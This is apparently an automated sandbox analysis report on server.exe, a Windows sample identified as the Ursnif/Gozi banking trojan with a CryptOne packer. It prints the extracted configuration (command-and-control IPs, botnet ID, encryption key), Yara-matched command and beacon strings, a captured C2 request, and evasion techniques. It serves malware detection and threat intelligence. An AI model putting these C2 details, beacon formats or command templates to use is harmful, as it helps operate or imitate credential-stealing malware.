Edit tour

Windows Analysis Report
server.exe

Overview

General Information

Sample Name:	server.exe
Analysis ID:	826138
MD5:	43cfce2e126b1bf5230e51edd205f6bd
SHA1:	9ca60bfc3cb13b40f02810869ce9531cb0ab76d4
SHA256:	47d288233a39a68396567e35a77a500e296218df3a4bc9daca797e75b4b03d4b
Tags:	agenziaentrateexegoziisfbITAmefmiseursnif
Infos:

Detection

Ursnif, CryptOne

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Detected unpacking (changes PE section rights)

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Yara detected CryptOne packer

Snort IDS alert for network traffic

Yara detected Ursnif

Found evasive API chain (may stop execution after checking system information)

Writes or reads registry keys via WMI

Writes registry values via WMI

Found API chain indicative of debugger detection

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Contains functionality to call native functions

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Contains functionality to dynamically determine API calls

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

server.exe (PID: 5596 cmdline: C:\Users\user\Desktop\server.exe MD5: 43CFCE2E126B1BF5230E51EDD205F6BD)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Gozi, Ursnif	2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.	No Attribution	http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/ https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007 https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Crypt	Yara detected CryptOne packer	Joe Security
00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1228:$a1: /C ping localhost -n %u && del "%s" 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xa9c:$a5: filename="%.4u.%lu" 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe6d:$a9: &whoami=%s 0xe56:$a10: %u.%u_%u_%u_x%u 0xd63:$a11: size=%u&hash=0x%08x 0xb1d:$a12: &uptime=%u 0x6fb:$a13: %systemroot%\system32\c_1252.nls 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd96:$a9: Software\AppDataLow\Software\Microsoft\ 0x1ce8:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1228:$a1: /C ping localhost -n %u && del "%s" 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xa9c:$a5: filename="%.4u.%lu" 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe6d:$a9: &whoami=%s 0xe56:$a10: %u.%u_%u_%u_x%u 0xd63:$a11: size=%u&hash=0x%08x 0xb1d:$a12: &uptime=%u 0x6fb:$a13: %systemroot%\system32\c_1252.nls 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd96:$a9: Software\AppDataLow\Software\Microsoft\ 0x1ce8:$a9: Software\AppDataLow\Software\Microsoft\
Process Memory Space: server.exe PID: 5596	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: server.exe PID: 5596	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x16c05:$a5: filename="%.4u.%lu" 0x16dbb:$a5: filename="%.4u.%lu" 0x22594:$a5: filename="%.4u.%lu" 0x2274a:$a5: filename="%.4u.%lu" 0x167b8:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x22147:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x7835:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x7916:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x7b7a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa52b:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa60c:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa7ae:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x1692c:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x16d05:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x16ebd:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x222bb:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x22694:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x2284c:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x1711d:$a9: &whoami=%s 0x22aac:$a9: &whoami=%s 0x17106:$a10: %u.%u_%u_%u_x%u
Process Memory Space: server.exe PID: 5596	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x16cac:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x16e64:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x2263b:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x227f3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x167b8:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x16815:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x22147:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x221a4:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x16bd1:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x16d87:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x22560:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x22716:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x16fb7:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x17290:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x22946:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x22c1f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x17059:$a9: Software\AppDataLow\Software\Microsoft\ 0x1732d:$a9: Software\AppDataLow\Software\Microsoft\ 0x17e85:$a9: Software\AppDataLow\Software\Microsoft\ 0x17ed3:$a9: Software\AppDataLow\Software\Microsoft\ 0x229e8:$a9: Software\AppDataLow\Software\Microsoft\
Click to see the 5 entries

Snort Signatures

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.4 - Destination IP: 62.173.142.51

Timestamp:	192.168.2.462.173.142.5149685802033203 03/14/23-12:27:29.882824
SID:	2033203
Source Port:	49685
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: server.exe

ReversingLabs: Detection: 12%

Source: 0.2.server.exe.2190174.1.unpack	Avira: Label: TR/Kazy.4159236
Source: 0.2.server.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen7

Source: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_02BD1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

0_2_02BD1508

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\server.exe

Unpacked PE file: 0.2.server.exe.400000.0.unpack

Source: server.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49685 -> 62.173.142.51:80

Source: global traffic

HTTP traffic detected: GET /drew/HAyCvnAuEOt2F7C/qtqWyxm4JAodLmr2fA/5rIXi6c7a/A8VZuoBaw9m9tdhD88nR/7GG7oRWMVub4oY7_2BO/OtqOu0B56I1LS_2FdHx85_/2FJqjErmgnBnc/fR5wyLVd/zR03KdsDmrJhOpNTELG8Ap7/tRbeA0rm1D/Ahqeb_2B_2Fx66NAH/sAJz2fkfv30m/_2B2yXv1C0u/OTAlb_2Bjz3Xu9/n7nMr5QIveWoLOKJgWpZZ/FZTPBpvOXNqs9vrA/ayBpSg1Jbp3hq/vUJdeVU7/u.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.51Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

ASN Name: SPACENET-ASInternetServiceProviderRU SPACENET-ASInternetServiceProviderRU

Source: unknown

DNS traffic detected: query: checklist.skype.com replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 62.173.142.51
Source: unknown	TCP traffic detected without corresponding DNS query: 62.173.142.51
Source: unknown	TCP traffic detected without corresponding DNS query: 62.173.142.51
Source: unknown	TCP traffic detected without corresponding DNS query: 62.173.142.51
Source: unknown	TCP traffic detected without corresponding DNS query: 62.173.142.51
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.183.153
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.183.153
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.183.153

Source: server.exe, 00000000.00000002.569377745.00000000027FC000.00000004.00000010.00020000.00000000.sdmp

String found in binary or memory: http://94.103

Source: unknown

DNS traffic detected: queries for: checklist.skype.com

Source: global traffic

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR

E-Banking Fraud

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_02BD1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

0_2_02BD1508

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown

Writes or reads registry keys via WMI

Source: C:\Users\user\Desktop\server.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\server.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\server.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\server.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Users\user\Desktop\server.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\server.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\server.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: server.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_02BD16DF	0_2_02BD16DF
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_02BD1D8A	0_2_02BD1D8A
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_02BD832C	0_2_02BD832C

Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_0040110B GetProcAddress,NtCreateSection,memset,	0_2_0040110B
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_00401459 NtMapViewOfSection,	0_2_00401459
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	0_2_004019F1
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_02BD421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_02BD421F
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_02BD8551 NtQueryVirtualMemory,	0_2_02BD8551
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_02190F65 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,	0_2_02190F65

Source: server.exe

ReversingLabs: Detection: 12%

Source: C:\Users\user\Desktop\server.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\server.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_02BD30D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_02BD30D5

Source: C:\Users\user\Desktop\server.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@1/2

Source: C:\Users\user\Desktop\server.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\server.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\server.exe

Unpacked PE file: 0.2.server.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\server.exe

Unpacked PE file: 0.2.server.exe.400000.0.unpack

Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_02BD7F30 push ecx; ret	0_2_02BD7F39
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_02BD831B push ecx; ret	0_2_02BD832B
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_0219A3E0 push edx; ret	0_2_0219A558
Source: C:\Users\user\Desktop\server.exe	Code function: 0_2_0219A290 push edx; ret	0_2_0219A29B

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,

0_2_00401000

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: icon.png

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR

Source: C:\Users\user\Desktop\server.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\server.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking system information)

Source: C:\Users\user\Desktop\server.exe

Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep

Source: C:\Users\user\Desktop\server.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\server.exe

API call chain: ExitProcess graph end node

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\Desktop\server.exe

Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,

0_2_00401000

Source: C:\Users\user\Desktop\server.exe

Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\server.exe	Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,		0_2_004019F1
Source: C:\Users\user\Desktop\server.exe	Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,		0_2_02190F65

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_02BD3BD3 cpuid

0_2_02BD3BD3

Source: C:\Users\user\Desktop\server.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_00401D68

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_004015B0

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_02BD3BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_02BD3BD3

Stealing of Sensitive Information

Yara detected CryptOne packer

Source: Yara match

File source: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR

Remote Access Functionality

Yara detected CryptOne packer

Source: Yara match

File source: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR

Mitre Att&ck Matrix

